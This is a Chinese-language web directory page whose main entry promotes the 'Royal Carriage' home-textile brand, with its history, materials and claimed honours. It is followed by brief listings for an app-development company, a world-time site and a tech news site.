    馬車源自华夏千年礼制,始于“天子驾六”的皇家威仪。馬车,是帝王仪仗,是身份象征,更是东方尊贵生活的传承载体。皇家馬车家纺,承中式皇家礼序,融东方典雅美学,以匠心织就尊贵、舒适、荣耀的中式睡眠美学,让每一户人家,皆藏皇家气度。 皇家馬车家纺品牌源之于承华夏皇家礼序,筑东方品质寝饰。自古以来皇家馬车无论从欧洲皇室到我们中国的华夏文明,车马为礼;皇家馬车,自古便是帝王专属仪仗,象征至高无上的身份、威仪与尊贵。自周代“天子驾六”定礼制,秦汉“金根车”彰皇权,唐宋“大辇”显威仪,明清“銮驾”集大成,皇家馬车,早已沉淀为东方文化中尊贵、典雅、荣耀、传承的核心符号。 皇家馬车家纺,根植中国千年皇家车马文化,1992年源自福建台资企业,已深耕中高端家纺34载。品牌以“传承中式皇家礼序,打造国人轻奢寝居”为初心,将皇家馬车所代表的礼制、尊贵、精工、传承,融入每一件床品的设计与织造。 品牌自创立以来,始终坚守品质为本,引进台湾先进纺织工艺与生产管理体系,严选优质长绒棉、桑蚕丝、天然纤维等高端原材料,全程标准化品控,面料细腻亲肤、健康环保。先后荣获2000年、2012年福建省著名商标荣誉称号,2006获ISO9001:2000质量管理体系认证企业,为产品的品质奠定了坚实基础。凭借过硬品质与深厚品牌底蕴,深受广大消费者信赖与认可,高峰时期全国17个省市均有 皇家馬車专卖店。 2025年由福州东盈家居科技有限公司全面接手操盘运营,焕新升级,生产基地从福建迁移到江苏南通家纺产业核心区,配备行业前沿设备。重塑品牌发展战略,打通线上线下全域渠道。线下设立福州晋安区喜盈门旗舰店,全国门店持续布局扩张。皇家馬车家纺秉持匠心初心,坚持高端品质、亲民定价,让万千家庭,都能用上高品质,皇室级的寝饰,享受舒适精致睡眠生活。 我们萃取中式皇家美学元素——龙凤呈祥、祥云瑞气、织金刺绣、典雅纹样,结合现代家纺工艺,严选高支长绒棉、桑蚕丝等高端原料,以台资精工标准,打造兼具东方贵气与现代舒适的中高端家纺。 从“福建省著名商标”到“家纺行业十大品牌”,皇家馬车家纺始终坚守“高贵不贵,匠心传承”,让千年皇家礼制,化作日常居家的尊贵体验;让每一户中国家庭,都能拥有属于自己的东方皇家睡眠礼遇。

    huangjiamache.mhwz.cn
  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com

最新优秀网站